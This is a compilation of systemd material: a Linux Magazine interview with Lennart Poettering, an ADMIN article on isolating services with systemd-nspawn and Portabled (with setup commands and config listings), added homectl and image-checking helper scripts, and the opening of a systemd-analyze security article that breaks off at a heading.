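As an added example (not from the article or the systemd project), the following bash script wraps the homectl calls described above. It picks the FIDO2 device from the output of `homectl --fido2-device=list` only when exactly one is plugged in, because `auto` is ambiguous otherwise; it always passes `--recovery-key=yes`; and afterwards it checks the user record printed by `homectl inspect --json=short` for both a hardware credential and a recovery key, so that a lost token does not also mean a lost home directory. The table layout assumed for the list output and the record field names `fido2HmacCredential`, `pkcs11TokenUri` and `recoveryKeyType` are taken from systemd's JSON user record format, not from the article, and `HOMED_WRAPPER_RUN` and `DRY_RUN` are names chosen here.

```shell
#!/bin/bash
# Added example, not part of the article: wrapper around the homectl calls
# for a FIDO2-unlocked home directory with a mandatory recovery key.
set -euo pipefail

# Return the single /dev/... path in a `homectl --fido2-device=list` listing.
# Assumption: the listing is a table whose first column is the device path.
# Exit 1 if no device is listed, 2 if several are (then `auto` is ambiguous).
pick_fido2_device() {
    local listing=$1 devices count
    devices=$(printf '%s\n' "$listing" | awk '$1 ~ /^\/dev\// {print $1}')
    count=$(printf '%s\n' "$devices" | grep -c '^/dev/' || true)
    case $count in
        0) echo "no FIDO2 device plugged in" >&2; return 1 ;;
        1) printf '%s\n' "$devices" ;;
        *) echo "$count FIDO2 devices plugged in; --fido2-device=auto is ambiguous" >&2; return 2 ;;
    esac
}

# Run (or, with DRY_RUN set, print) the homectl create call. The recovery key
# is always requested so that losing the token does not lock the user out of
# the LUKS volume that holds the home directory.
create_home_user() {
    local user=$1 realname=$2 uid=$3 image=$4 device=$5
    set -- homectl create "$user" --real-name="$realname" --uid="$uid" \
           --image-path="$image" --fido2-device="$device" --recovery-key=yes
    if [ -n "${DRY_RUN:-}" ]; then printf '%q ' "$@"; echo; else "$@"; fi
}

# Inspect a saved user record (homectl inspect --json=short USER > FILE) for
# the unlock methods it carries. Prints one line per method found and
# returns 1 when either the hardware credential or the recovery key is absent.
check_record_unlock_methods() {
    local record=$1 hw=0 rk=0
    grep -q '"fido2HmacCredential"' "$record" && { echo "fido2"; hw=1; }
    grep -q '"pkcs11TokenUri"' "$record" && { echo "pkcs11"; hw=1; }
    grep -q '"recoveryKeyType"' "$record" && { echo "recovery-key"; rk=1; }
    [ "$hw" -eq 1 ] || echo "warning: no hardware token enrolled" >&2
    [ "$rk" -eq 1 ] || echo "warning: no recovery key; a lost token means a lost home" >&2
    if [ "$hw" -eq 1 ] && [ "$rk" -eq 1 ]; then return 0; else return 1; fi
}

# usage: HOMED_WRAPPER_RUN=1 ./homed-create.sh martin "Martin Loschwitz" 2000 /dev/disk/by-id/usb-...
main() {
    local device record
    device=$(pick_fido2_device "$(homectl --fido2-device=list)")
    create_home_user "$1" "$2" "$3" "$4" "$device"
    record=$(mktemp)
    homectl inspect --json=short "$1" > "$record"
    check_record_unlock_methods "$record"
    rm -f "$record"
}

if [ -n "${HOMED_WRAPPER_RUN:-}" ]; then main "$@"; fi
```

The record check is the part worth keeping around: run it against `homectl inspect --json=short USER` for every Homed account after a `homectl update`, because adding a token with `--fido2-device=auto` does not add a recovery key.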

Interview: Lennart Poettering

The achievements of and plans for systemd

Extending Integration

We talked to systemd maintainer Lennart Poettering about the sense and purpose of some systemd features. By Jens-Christoph Brendel
Photo: CC-BY-SA-3.0 [1]

Linux Magazine: If you take stock of the last three or four years, what have been the most important innovations in systemd during this time?

Lennart Poettering: That would be, firstly, all the security features we have added and made visible with the systemd-analyze security tool. Regular system services can now be locked into effective sandboxes with relative ease, but can still be integral parts of the host operating system. I believe this has advanced Linux system security quite a bit.

Another important innovation might be systemd-tmpfiles and systemd-sysusers. Strictly speaking, they are more than four or five years old, but it is only in the last three or four years that they have finally seen more widespread use in the popular distributions. We are looking to move to a declarative description of the system and its components, leaving behind imperative scriptlets in packages and the like. This improves robustness, security, and reproducibility.

The dynamic user strategy makes it possible to allocate system users dynamically when starting system services that are automatically released again when the service terminates. This takes into account that system users are the original mechanism used to implement privilege separation on Unix and Linux. No matter which subsystem you look at, access control based on users is always implemented on Linux. Other concepts – such as SELinux labels, Access Control Lists (ACLs), other Mandatory Access Controls (MACs), and so on – are not universally available and are nowhere near as popular or as universally well understood.

Classically, however, such system users are expensive, with only 1,000 of them (or sometimes only 100 or 500, depending on the distribution), and they are allocated individually during package installation. So traditionally they can only be used roughly to secure large services but not to protect individual instances or transactions. There are simply too few of them for that. The dynamic user concept solves the dilemma: It makes cheap what was previously expensive. Dynamic users can be allocated for a short time and returned after use. This practically breathes new life into an old Unix strategy and is a mechanism that can definitely contribute a great deal to further improving the security of Linux systems.

Last but not least is systemd-homed, a really secure home directory management system where the user password is the encryption key. I could continue this list for a long, long time – after all, there are so many useful new features in systemd. If you want to know more, take a look at the NEWS file in the systemd sources, which is where we write everything down in more detail, while hopefully keeping things reasonably well understandable.

Maybe a word about one last set of innovations: We recently added support for FIDO2, PKCS#11, and TPM2 security chips to systemd for disk encryption or user authentication. For the first time, this makes it possible to set up truly secure systems on Linux with practically on-board tools, without getting lost in massive manual scripting sessions or reducing security to passwords.

LM: What else is on the wish list for the near future?

LP: Many people working on systemd have different interests. Personally, I have a great interest in simply making Linux even more secure, and, by that, I mean the classic, generic Linux distribution.

It hurts a bit that other operating systems like macOS or Windows currently protect user credentials better

than we commonly do on Linux with our home directories. Even the non-traditional Linux systems like Chrome OS or Android are generally far better secured than classic Linux distributions because they detect and prevent offline modifications of the system, for example. Applications also run on them in relatively secure sandboxes by default. None of this really exists on classic Linux so far. There are projects in this vein, but only a few of them have reached the "mainstream" of Linux distributions so far.

This is exactly where I hope to improve the situation. The basic infrastructure is certainly provided by most distributions, but there is a lack of integration, of connecting the various subsystems to make them useful, which is exactly what the support for TPM2/PKCS#11/FIDO2, mentioned earlier, is aimed at. The subsystems for the respective technologies have existed for a long time, but few specialists actually use them together because the required integration with the rest of the operating system just never happened or was incomplete. I see systemd as the project that can do precisely that in a good way – determining where the journey should go and then integrating the subsystems needed to get there. For example, tying disk encryption to TPM2/PKCS#11/FIDO2 fits right into this scheme, but there is far more to be done in this area.

Thus, while many – possibly even most – users use disk encryption on Linux, typically typing the disk password does not protect the program code very well, which leaves you helplessly exposed to an evil maid attack, an offline attack in which someone simply exchanges the boot code of the system being attacked. You have no way to tell whether the cryptsetup binary to which you give your password is really the one you trust or perhaps a hijacked one that immediately sends the password to an attacker.

Other operating systems are doing much better, including Linux-based ones. I'd like to see us catch up there with generic Linux distributions so that the data on our laptops remains at least as secure in every way as, say, on a Chrome OS system. It's downright embarrassing that this is not yet the case. We need to do better, especially in this age of Pegasus and similar systematic security threats. I think systemd can and should play a certain role in making generic distributions more secure: more TPM2, meaningful secure boot, more sandboxing, more encryption, more integrity – and all without really demanding more knowledge from the admin.

Another related topic in this context is Rust: Sooner or later we should move away from C. It's just too hard to use the language correctly, and even the best developers make mistakes all the time. Rust is probably the first language that has a chance to replace C on a broad front. For systemd, that means we have to figure out how to make the transition as developers. We don't want to be pioneers but instead wait for other projects to solve the most pressing problems for us before we make the leap ourselves. After all, for us, a programming language is just a tool, not a purpose in itself.

LM: One of the systemd goals was to accelerate and standardize boot sequences. This goal can be considered achieved today with most distributions relying on systemd, but did this not happen at the cost of a far larger number of systems being affected in the case of security-relevant errors than the case would be with more diversity?

LP: Acceleration was never the primary goal of systemd development but simply a side effect of the work to implement the boot process in a reasonably state-of-the-art way. We have emphasized this time and time again. We always try to find the balance between having a manageable, modular system while booting quickly and in a reasonably straightforward way. If in doubt, however, we have always opted for correctness and manageability.

By way of an example, we work a lot with small files in drop-in directories, such as unit files located in /usr/lib/systemd/system/*. These support modularity, so package managers can easily and elegantly add and remove components from the operating system. In terms of boot speed, this is more of a disadvantage: If we packed the service descriptions into a single large file instead of many small ones, they could almost certainly be read many times faster, but then nothing would be modular. However, modularity is more important to us than plain speed at boot time, so we went for drop-in files anyway.

I don't think it's a good idea to balance supposed speed advantages against security gains from more init system alternatives – they have nothing to do with each other. Sure, it would be good if there were convincing Linux init system alternatives to systemd – competition stimulates business, monoculture is not ideal – but I still believe that the very best thing for more computer security is better technical security strategies: more sandboxing, lockdown, integrity checks, and so on. You certainly don't do general computer security any favors by continuing to maintain multiple init systems that offer no security strategy at all. However, if we give systemd security features that are then widely used, that's worth far more at the end of the day.

To put it another way, I find it far more interesting to make one class of attacks completely impossible than to hope that "only" one half of the Linux world is vulnerable to it because the other half uses a slightly different system. On top of this, sure, there is definitely some interesting competition driving the security of computer systems, such as Chrome OS, Android, Windows, macOS, and so on. For us, this is highly relevant inspiration.

I would like to set one thing straight: Thus far, systemd actually looks very

good when it comes to code quality and vulnerabilities. We have significantly fewer CVEs or the like (admittedly not a good metric) than other projects with similar numbers of lines of code. It should also be remembered that projects such as wpa_supplicant weigh in with more lines of code than systemd (even the kernel has many times that), so with all the components that come with systemd, the init system is not exactly the primary component to worry about. The attack surface of the WiFi stack or the kernel turns out to be far larger, so a monoculture there certainly causes bigger problems.

LM: Originally, systemd was intended as a replacement for the SysVinit system. In the meantime, however, it manages all kinds of resources, including its own out-of-memory (OOM) killer. In 2018, Facebook already came out with OOMd developed in-house as a competitor to the implementation in the kernel. What makes the systemd version better than the two predecessors?

LP: The systemd-oomd service integrated into systemd was programmed by Facebook developers. It is a simplified evolution of the old separate OOMd.

Systemd manages system services – that is its very specific task. Two facets of this management are lifecycle management and resource control (i.e., correct and clean startup and shutdown of services at the right times and the allocation of resources and their limits). An OOM service directly intervenes in exactly these two parts. Depending on individually configurable parameters, it shuts down services as needed. This works best when the OOM service and systemd agree on what to do. That's why we integrate strategies: systemd-oomd can analyze the system and become active; the systemd service manager knows about it and informs the administrator correctly.

Additionally, the following applies here: We always add components to systemd when we assume that the service will ultimately benefit a significant majority of users. This should also be the case with systemd-oomd. To use available resources in the best possible way under load, you need a service like OOMd. Unlike, say, the OOM killer in the kernel, it keeps an eye on the whole system. It tries everything to handle resource bottlenecks and the resulting latencies as locally as possible and not to affect the whole system. This is needed to utilize thick servers as fully as possible but also to achieve maximum performance in embedded systems with few resources – and helps on the desktop, as well. For the first time, you can no longer freeze your laptop with make -j on the wrong build tree.

LM: How does systemd fit into a world where applications are increasingly no longer launched directly from the operating system but in the form of containers?

LP: Here, too, you need an underlying operating system. The container strategy is (among other aspects) primarily about isolation from the host OS. However, extensive isolation from the host operating system is neither helpful nor possible for many applications. A service that makes extensive use of hardware can only be run in a container if you rely on hacks and workarounds.

Containers are without question very useful but are more for payloads than for system components. For the latter, you need infrastructure like that provided by systemd. The sandboxing offered by systemd for system services is ultimately inspired by container strategies, but it takes into account that complete isolation (e.g., a complete directory tree of its own) is more of a hindrance for system services. Therefore, it allows for far more modular sandboxing that tries to support integration, while still minimizing the attack surface for hacks as much as possible.

LM: What distinguishes containers launched by Nspawnd from portable services?

LP: The systemd-nspawn tool is versatile and so are portable services. Where one makes more sense than the other is not always clearly defined. Basically, though, I would say systemd-nspawn is about working in a similar way to lightweight VMs (virtual machines). For example, with Nspawn, a more or less complete Linux can be booted without any overhead, almost like in a VM. Portable services is more about making individual system services a bit more portable (i.e., making it easier to move relatively integrated system services between machines).

You could also say that the first program that runs as a payload in a VM is the operating system kernel. In an Nspawn container this is an OS init system instead, whereas in a portable service it is the main program of a service. The latter may resemble a Docker container, but Docker containers tend to run isolated from the host OS, which is not so much the case for portable services.

LM: Kubernetes and its offshoots such as OpenShift have become widely accepted for container management. What niche can systemd-nspawn best serve?

LP: systemd-nspawn can run containers, whereas Kubernetes orchestrates containers in clusters – two very different tasks. Kubernetes normally uses a tool like runc to run the containers. If you want, you could use systemd-nspawn instead of runc to do this; the infrastructure would lack very little. For example, systemd-nspawn already has direct support for running OCI containers onboard.

I personally have certain doubts about the Kubernetes approach. It seems to me that a lot of things have not been thought through to the end but glommed together with hot glue. That's why I haven't done anything yet to make systemd-nspawn usable as a back end for Kubernetes. I think such an approach would have advantages in terms of security and especially resource control.

Basically, however, Docker-style containers usually only run individual services in them, not the entire operating system. As mentioned before, the focus of systemd-nspawn is more on the latter. We want to make it easy to run full Linux userspaces in them, much like in a VM or on a physical system. So, the focus of systemd-nspawn is a bit different from runc and Kubernetes.

LM: You propose migratable home directories that bring the user account information right along with them. Does that only work if the user mounts their home directory on their own host? Who else would create such a directory on a portable medium? In the conventional system, the write protection for /etc/passwd ensures that a user cannot add their account to arbitrary groups, for example. If this information is located directly in the home directory, the user should not be allowed to edit it there. Who can do this if the directory is to be mounted on arbitrary hosts?

LP: Typically, home directories are still located on your own laptop's hard drive, but if you let systemd-homed manage them, you can also put them on, say, a USB stick and move them safely back and forth between different systems. I'm sure some users will find this helpful, but it's more of a side effect of the design and not the goal. I myself use systemd-homed to manage my home directory, but I just store it on my laptop's SSD.

The user records that systemd-homed manages are cryptographically signed, and the daemon only accepts records that match the local machine. This signing and verification takes place completely automatically, without the user having to do it manually. This means two things: First, users cannot easily modify their own user records unless they know the system's secret key, which is protected under /var and should therefore only be known to the system and root. Second, when moving a home directory from one system to another, you have to make sure that the signature key of the first machine is also accepted on the second machine, which can be done by a simple scp.

LM: Mr. Poettering, thank you very much for the insightful interview.

Info
[1] Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0): https://creativecommons.org/licenses/by-sa/3.0/
Container Security

Create secure simple containers with the systemd tools Nspawnd and Portabled

Isolation Ward

Systemd comes with two functions for container management that allow many programs to run more securely through isolation. By Martin Loschwitz
Photo by Ian Taylor on Unsplash

The debate surrounding systemd, originally launched with the simple goal of replacing the ancient SysVinit scripts in most Linux distributions with a contemporary solution, has caused even venerable projects like Debian GNU/Linux to split into a pro-systemd faction (Debian) and an anti-systemd faction (Devuan).

However you look at it, though, success has proved systemd originator Lennart Poettering right. No major distribution today would seriously consider replacing systemd with another solution. The init system's relevance is dwindling in any case in the age of containerized applications. If MariaDB is just a container you need to launch, then the init system hardly needs to perform any magic.

If you follow Red Hat, SUSE, and its offspring, clearly containers are where the journey is headed (see the "Container Advantages" box). A container-first principle now applies to all enterprise distributions, with the exception of Debian. Systemd has a few aces up its sleeve that most admins don't even know about – not least because of the sometimes almost hysterical controversies surrounding the product. In the container context, these functions include Nspawnd and Portabled. When deployed correctly, they draw on features from the container world to make conventional applications more secure. If you use Nspawnd wisely, you could even save yourself the trouble of needing Docker or Podman. In this article, I provide an introduction to these two functions and explain how you can use the solutions to supplement your own setups.

Unknown Container Runtime

When asked about runtime environments for containers, most admins intuitively think of one of two candidates: Docker or Podman. Docker returned containers on Linux to the land of the living and provided a decent business model. That containers are considered commercially attractive at all today is largely thanks to Docker's persistent work. Podman, on the other hand, is known by most admins as the anti-Docker solution created by Red Hat that exists because the Docker developers once tangled with the crimson chapeau and, as expected, got the wrong end of the stick.

Podman is meant to work as a one-to-one replacement for Docker. That is why it adopts most of Docker's architectural assumptions, and they are tough, because the Docker notion of containers is complex (Figure 1) and can overwhelm you with feature bloat.

Container Advantages

From the point of view of both vendors and software producers, containers are convenient, with the distribution only having to provide a few components: a kernel and a runtime environment. The software provider, in turn, also only needs one container in their portfolio because it runs on basically every system with a functional container runtime. Where Red Hat and its associated distros used to have to maintain different versions of MariaDB, PostgreSQL, and practically all the relevant tools for their own distributions, today they only provide a shell and a kernel. The provider of the software itself steps into the breach and offers precisely one container that runs everywhere. Brave new world – and so elegant.

As great as this hip stuff may be, the inventory of current IT environments will remain around for a while yet, as well as the question of how this inventory can be used and managed more sensibly and in a better way. What is particularly annoying is that conventional environments do not benefit from the many advantages that containers undoubtedly offer, such as the separation of permissions, isolated access to your filesystems, and monitored network traffic.

Figure 1: Docker comprises a multitude of services and components. If you only need simple protection, you could quickly feel overwhelmed by the features (credit: Docker docs [1]).

Containers should be simple. All container implementations on the market ultimately rely on a relatively small set of security features that the Linux kernel itself has offered for a few years.

No container implementation can do without namespaces, which logically separate individual parts of the system (Figure 2). A network namespace, for example, lets you create virtual network cards without giving them direct access to the physical NICs of the host. Instead, this access must be established by a bridge or some other means. Namespaces do not only exist for network stacks; they also apply to individual points in the filesystem (mount namespaces), to process IDs, and to the assignment of user IDs on a Linux system. They always work along the same principle: As soon as a process starts in a namespace, it only sees the resources of that namespace, so the namespace acts like a jail. It is not an impenetrable one, though: a process that keeps capabilities such as CAP_SYS_ADMIN in the host's user namespace, or that finds a kernel bug, can still reach the host, which is why container runtimes additionally drop capabilities and apply seccomp filters.

Control groups (cgroups) are added on top in many container environments. Again, they are deeply embedded in the Linux kernel. In very simplified terms, cgroups account for and limit the CPU time, memory, I/O, and number of processes that a group of processes may consume. They complement namespaces nicely because they help you enforce an even tighter set of rules for applications and processes than would be possible with namespaces alone: a namespace decides what a process can see, a cgroup decides how much of it the process may use.

Figure 2: The kernel namespaces feature has many uses in the context of containers, allowing areas in a virtual system to be isolated from the main system (credit: Ivan Zahariev [2]).

More than Runtimes

If Nspawnd is a runtime environment for containers, yet at least two well-functioning environments already exist in the form of Docker and Podman, why, some might ask, does Poettering have his fingers in the pie again? The answer to this question is stunningly simple: systemd-nspawn targets admins who really only want to use basic kernel features to isolate individual processes.

The problem with Podman and Docker, after all, is that you never just get the program in question. Instead, they come with a huge pile of assumptions and prerequisites about how to run a container well and sensibly. You might not even want to deal with things like volumes, software-defined networking, and other stuff if all you want to do is put an Apache process in a virtual jail. Also, you might not want to install dozens of megabytes of additional software for Docker or Podman, thereby raising the maintenance overhead, although this step is not strictly necessary from a functional point of view. Anyone who can see themselves in this scenario – simple containers that use built-in tools without too much tinsel – is a candidate for the target group that Nspawnd has in mind, even if the scope of Nspawnd has naturally expanded in recent years.

The daemon has been part of systemd since 2015, so it's an old acquaintance. The "N" in the name – you probably guessed it after following the article up to this point – stands for "namespaces." Reduced to the essential facts, Nspawnd is a tool that sets up the namespaces required for isolated operation of applications and then starts the applications. Some developers jokingly refer to it as "Chroot on steroids," which works well as a metaphor. In the context of concrete technology, however, the comparison is misleading: a chroot only changes the root directory, whereas nspawn also separates process IDs, the network, IPC, and, with user namespaces, the UID range from the host.

Containers, Pronto!

Nspawnd is now included in most distributions, so a container can be created on a normal Linux system in next to no time. Creating a usable template takes longest; in Docker or Podman parlance, this would be referred to as an image. Nspawnd only requires a working filesystem of a Linux distribution. You can put this in place in different ways.

The following example assumes Debian GNU/Linux 11 alias "Bullseye" as the distribution used in the container. In the first step, after installing the debootstrap package (Figure 3), you populate an empty folder on a Debian system with a basic Bullseye system:

# debootstrap --arch amd64 bullseye /mnt/containers/bullseye-1 https://debian.inf.tu-dresden.de/debian/

To log in to the container as root, pts/0 must be in /etc/securetty:

echo "pts/0" >> /mnt/containers/bullseye-1/etc/securetty

If you now want to start a running container from the directory you just created, type:

systemd-nspawn -D /mnt/containers/bullseye-1

You can now run passwd to change the password for root in the container or add new users. All other commands that you will be familiar with from a normal Debian system are available to you. The recommendation is to store central files such as the package sources in the template and to update the package sources in the template immediately by running apt update. You need to delete the /etc/hostname file in the template so that the container uses the name assigned by Nspawnd later. Finally, D-Bus needs to be installed in the container because the machinectl userland tool (Figure 4), which you use to control the containers from the

Figure 3: A container suitable for running in Nspawnd or Portabled is quickly built with typical Debian tools like debootstrap.

22 ADMIN 67 WWW.ADMIN-MAGAZINE.COM
Container Security FEATURES
host, cannot communicate with the particular container otherwise. Once the template is created, copy it to a location with a suitable name (e.g., /var/lib/machines/webserver-1). The next step is to start the container with:

systemd-nspawn -M webserver-1 -b -D webserver-1

After that, you can install the userland software that you want to run in the container (e.g., an Apache web server).

Unit Automation

If you want to wake up the container automatically at system startup, you can do so with a systemd unit file (Listing 1), where you can also configure the network for the container. Systemd basically offers shared networking over a bridge or with a variety of other options. The shared variant, however, is most convenient if it is only a matter of passing through individual ports. The file from Listing 1 is a ready-made unit file for a Bullseye web server container that Nspawnd starts at boot time.
After a systemd reload, the command

machinectl start webserver-1

starts the freshly created container. If you now configure the directory you just copied to run a web server, it will run autonomously and in isolation from the rest of the system. Even if someone breaks into an unmaintained Joomla or Typo3 on the web server, they do not automatically gain access to the resources of other users or the host – and completely without Docker, Podman, or other hipster stuff.

Listing 1: Systemd Unit for Container
# /etc/systemd/nspawn/webserver-1.nspawn
[Exec]
PrivateUsers=pick

[Network]
Zone=web
Port=tcp:443

[Files]
PrivateUsersChown=yes

Mini-Containers

To understand what the second service I talk about in this article (systemd-portabled) does, you need to revisit the functionality of systemd-nspawnd. In practical terms, Portabled plays a very similar tune: Under the hood, it uses much of the functionality that Nspawnd also uses.
Portabled has been part of systemd since version 239, so it should certainly be in place on recent distributions. Although Podman and Docker fans won’t like to hear it, Portabled essentially offers precisely the features that Red Hat, SUSE, and their offspring have in mind when they talk about “rump systems” and look to deliver their software in containers. However, it does so without most of their complexity.
Admittedly, the container and its environment consequently lack a few features that Docker and others give you. When it comes to just isolating services and making them portable, though, Portabled is very handy, especially for existing systems that you want to harden without having to switch completely to Docker or Podman.
The basic idea behind Portabled is that you build small container images containing one or more services along with a matching configuration. If a Linux system has a current kernel with support for namespaces and a current systemd environment, the container image can be rolled out on this host and operated there – so the theory goes. The highlight is that this process is completely independent of the package manager in place.

Finding an Image

For an image to be usable with Portabled, it only needs to meet a few requirements. As in the previous example, the recommendation is to use tools like debootstrap to create a basic filesystem. As in the case of Nspawnd, portable images do not need their own kernel or bootloader, but if you want to use a RAW image, it must be equipped with a suitable partition table that the Linux kernel on the host system understands. The systemd in the image also needs a working unit file for the service or services that the container will be running. The /etc/machine-id file must be in place, as must /usr/lib/os-release. Also, a resolv.conf is required for the services in the container. Everything else is taken care of automatically by tools like debootstrap. The example here assumes that you have created a lamp.raw file that contains a basic Debian GNU/Linux 11 and has Apache 2, MariaDB, and PHP. Most importantly, the systemd

Figure 4: The machinectl command manages containers in Nspawnd in the shell. If so desired, the process can be automated with a unit file.

unit files must be located in the image in /usr/lib/systemd/system/lamp-apache.service and /usr/lib/systemd/system/lamp-mariadb.service for Portabled to find them later. When Portabled then starts the container on the target system, it copies these files on the host and adds various custom settings that can relate to, say, logging or handling output on stdout. Clearly, the systemd developers wanted you to have to do as little work as possible with portable images.

Basic and Overlay Images

Talking of keeping the workload manageable, the workflow described here suggests that you have to copy the default image created at the beginning for each container that will contain a service or multiple services; however, this is not true because Portabled also allows you to combine multiple partial images and create a complete image with OverlayFS. For this to work, the extension images in the /usr/lib/extension-release.d/ directory must contain a file with an arbitrary name that contains at least the ID= lines with the extension image ID, and SYSEXT_LEVEL= and VERSION_ID entries with the extension image data that extends the original image.
Like Nspawnd, Portabled also has its own command-line interface for manipulating containers: portablectl. For example, the command

portablectl attach --extension lamp_1.raw debian-bullseye_1.raw lamp

attaches the lamp extension to the image for Debian GNU/Linux Bullseye. In the next step, the container that Portabled stitches together with OverlayFS can then be treated as if it were a complete container in its own right. The workflow described here makes it quite easy to maintain a basic image and to vary the use of many small extensions.

mkosi Can Help

If you are not comfortable with the distributors’ tools for creating an image, you will find that the mkosi (make operating system image) tool is a good alternative. In simple terms, mkosi is a small tool that creates a folder with the complete filesystem of a Linux distribution, which can then be used in systemd with Nspawnd or Portabled like a normal container. The program can be found in the systemd GitHub directory [3]; its use is almost trivial. To create a Debian image that corresponds to that described in detail above, you just need the command:

$ mkosi -d debian -r bullseye -t gpt_ext4 -b --checksum --password secret --package openssh-client,vim -o image.raw

An image.raw file will then contain a Bullseye image that in turn contains openssh-clients and Vim, along with the standard selection of packages. If you are not a fan of command-line parameters, you can alternatively pass in a configuration file to mkosi. The example from Listing 2 has the same effect as the command above.

Listing 2: mkosi Config File
[Distribution]
Distribution=debian
Release=bullseye

[Output]
Format=gpt_ext4
Bootable=yes
Output=image.raw

[Packages]
Packages=openssh-client vim

[Validation]
Password=secret

One disadvantage of mkosi is that it does not take care of installing the packages it needs when creating images. On Debian systems, the task of manually installing the debootstrap and debian-archive-keyring packages falls to you before invoking mkosi (Figure 5).

Accessing System Resources

One last question remains to be clarified in the context of this article; otherwise, the container fun might come

Figure 5: With mkosi, building images is far easier, but you have to install the distribution-specific tools up front.

to an abrupt end. How exactly do you provision host system resources in containers? I do not refer so much to specific hardware, because containers do not need their own kernel; they access the hardware directly through the host system’s kernel anyway, although they detour through namespaces to do so, adding a degree of control. What I mean is much more likely to be programs that need access to parts of the /sys tree or that retrieve information from /proc. Occasionally, it also happens that an application in one container needs to access the Unix socket of an application in another container.
The answer to how this works is quite simple: You make sure the directory in question exists on the host and tell systemd to provide the folders as bind mounts in the container by means of the BindPaths= and BindReadOnlyPaths= directives in the container’s systemd unit files. However, keep in mind that this is a deliberate, intentional blurring of security boundaries. Therefore, you should only go for this option if you have absolutely no alternative.

Conclusions

Very few admins are aware of the systemd components Nspawnd and Portabled discussed in this article, and this cluelessness is a mistake, despite your opinion of systemd. If you use one of today’s major distributions, chances are you have a setup with systemd. If it is already in place, why not just use it?
Both tools presented here offer genuine added value. Chroot is now considered insecure, and for good reason: Several scenarios have been documented for breaking out of a chroot environment. Namespaces in the Linux kernel are not only more modern, but also far more focused on security, where they offer considerable benefits. If you want to isolate applications, either from each other or from the rest of the system, without having to deal with the complexity of Docker or Podman, it is a very good idea to take a closer look at the systemd add-on Nspawnd.
The same goes for Portabled. Strictly speaking, the idea behind it is nothing other than what the major vendors are currently pursuing with their container strategies. Instead of the dependency hell of the usual package managers, cleanly defined container images contain just the bare necessities and otherwise have no external dependencies. Portabled can be forgiven for not following the container mantra “a microarchitecture application in a container” – especially against the background that Portabled is more likely to be used in classic environments in most cases anyway. In return, you can look forward to more convenience, enhanced security, and better administrability.
Anyone who is concerned about isolating services and securing their systems should definitely have these two standard systemd functions on their radar.

Info
[1] Docker architecture: [https://docs.docker.com/get-started/overview/]
[2] “Private networking per-process in Linux” by Ivan Zahariev: [https://blog.famzah.net/2014/06/05/private-networking-per-process-in-linux/]
[3] mkosi: [https://github.com/systemd/mkosi]

The Author
Freelance journalist Martin Gerhard Loschwitz focuses primarily on topics such as OpenStack, Kubernetes, and Ceph.

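As an added example (not from the article and not a systemd tool), a small Python checker for the image requirements listed under “Finding an Image” and “Basic and Overlay Images” above: it inspects an unpacked image root for the files and the extension-release keys named there. It assumes the image is available as a directory, that resolv.conf is looked for at etc/resolv.conf, and that the caller names the unit files the image must ship; the sample trees it builds are constructed, not real images, and the partition-table requirement for RAW images is not checked.

```python
"""Check an unpacked Portabled image root against the requirements the
article lists. Added example, not part of the article or of systemd.
Assumptions: the image is available as a directory, resolv.conf is looked
for at etc/resolv.conf, and the caller names the unit files the image must
ship. The partition-table requirement for RAW images is not checked here."""
import os
import tempfile
from pathlib import Path

# Files the article says every portable image needs.
REQUIRED_FILES = ("etc/machine-id", "usr/lib/os-release", "etc/resolv.conf")
# Keys the article says an extension-release file must carry.
EXTENSION_KEYS = ("ID", "SYSEXT_LEVEL", "VERSION_ID")


def parse_release_file(path):
    """Parse KEY=value lines (os-release syntax), dropping surrounding quotes."""
    data = {}
    for line in path.read_text().splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        data[key.strip()] = value.strip().strip("\"'")
    return data


def check_image(root, units):
    """Return a list of problems found under root; an empty list means the
    image meets every requirement this checker knows about."""
    root = Path(root)
    problems = []
    for rel in REQUIRED_FILES:
        if not (root / rel).is_file():
            problems.append(f"missing {rel}")
    for unit in units:
        if not (root / "usr/lib/systemd/system" / unit).is_file():
            problems.append(f"missing unit usr/lib/systemd/system/{unit}")
    ext_dir = root / "usr/lib/extension-release.d"
    if ext_dir.is_dir():  # only extension images carry this directory
        files = sorted(p for p in ext_dir.iterdir() if p.is_file())
        if not files:
            problems.append("usr/lib/extension-release.d is empty")
        for path in files:
            data = parse_release_file(path)
            for key in EXTENSION_KEYS:
                if key not in data:
                    problems.append(f"{path.name}: missing {key}=")
    return problems


def build_sample(root, complete):
    """Write a constructed sample tree (not a real image) modelled on the
    article's lamp example. With complete=False, resolv.conf is left out and
    the extension-release file lacks SYSEXT_LEVEL= so the checker has
    something to report."""
    r = Path(root)
    for d in ("etc", "usr/lib/systemd/system", "usr/lib/extension-release.d"):
        (r / d).mkdir(parents=True)
    (r / "etc/machine-id").write_text("0123456789abcdef0123456789abcdef\n")  # placeholder id
    (r / "usr/lib/os-release").write_text('ID=debian\nVERSION_ID="11"\n')
    if complete:
        (r / "etc/resolv.conf").write_text("nameserver 192.0.2.53\n")  # documentation address
    for unit in ("lamp-apache.service", "lamp-mariadb.service"):
        (r / "usr/lib/systemd/system" / unit).write_text("[Service]\nExecStart=/bin/true\n")
    release = 'ID=lamp\nVERSION_ID="1"\n' + ("SYSEXT_LEVEL=1\n" if complete else "")
    (r / "usr/lib/extension-release.d/extension-release.lamp").write_text(release)
    return str(r)


def run_demo():
    """Check a complete and an incomplete sample; returns both problem lists."""
    units = ("lamp-apache.service", "lamp-mariadb.service")
    with tempfile.TemporaryDirectory() as tmp:
        good = check_image(build_sample(os.path.join(tmp, "good"), True), units)
        bad = check_image(build_sample(os.path.join(tmp, "bad"), False), units)
    return good, bad


if __name__ == "__main__":
    for name, problems in zip(("complete", "incomplete"), run_demo()):
        print(f"{name}: {problems or 'OK'}")
```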
FEATURE systemd-analyze
Harden services with systemd

A Hard Nut to Crack

Systemd comes with a metric for determining the security of your system, letting you track how any service can be secured step-by-step in a sandbox. By Jens-Christoph Brendel

One of the most important goals in the development of systemd is securing Linux. Of course, you can only improve what can be measured, which is why Galileo Galilei advised: “Measure what is measurable, and make measurable what is not.” Following this maxim, systemd now makes system security under Linux measurable and improvable.
More specifically, it is the systemd-analyze security command that allows this measurement. When executed, it returns a table like that shown in Figure 1, listing each service managed by systemd (UNIT); a numerical value for the degree of protection (EXPOSURE, where 10 is both the highest and worst value); a verbal translation of this value (PREDICATE); and another version of the rating (HAPPY) in the form of an emoji.
Additionally, systemd-analyze can reveal how it arrives at its assessment: To see this, start it with the name of a service unit. As shown in Figure 2, it lists all the factors that have been checked, along with a checkmark for passed or an X for failed.

Not a Tough Cookie

